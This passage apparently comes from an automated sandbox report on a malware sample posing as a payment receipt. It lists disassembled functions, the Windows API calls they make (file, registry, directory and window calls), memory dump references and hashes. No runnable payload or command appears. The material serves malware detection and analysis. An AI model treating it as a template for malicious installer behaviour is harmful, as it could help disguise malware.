                                                                                                                                                                                    • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                    Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                    • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                                    Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                    • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                                                                                                                                                    Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                    • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                    • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                                    Function 004063A2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                    • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                    • Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
                                                                                                                                                                                    Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                    • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                                                                                                                                                    Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                    • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                                                                                                                                                    Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                    • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                                                                                                                                                    • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                                                                                                                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                                    • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                                                                                                                                                                                    Function 00404463 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                      • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrcatlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 281422827-0
                                                                                                                                                                                    • Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                                    • Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
                                                                                                                                                                                    Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                    • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                                                                                                                                                    Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                    • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
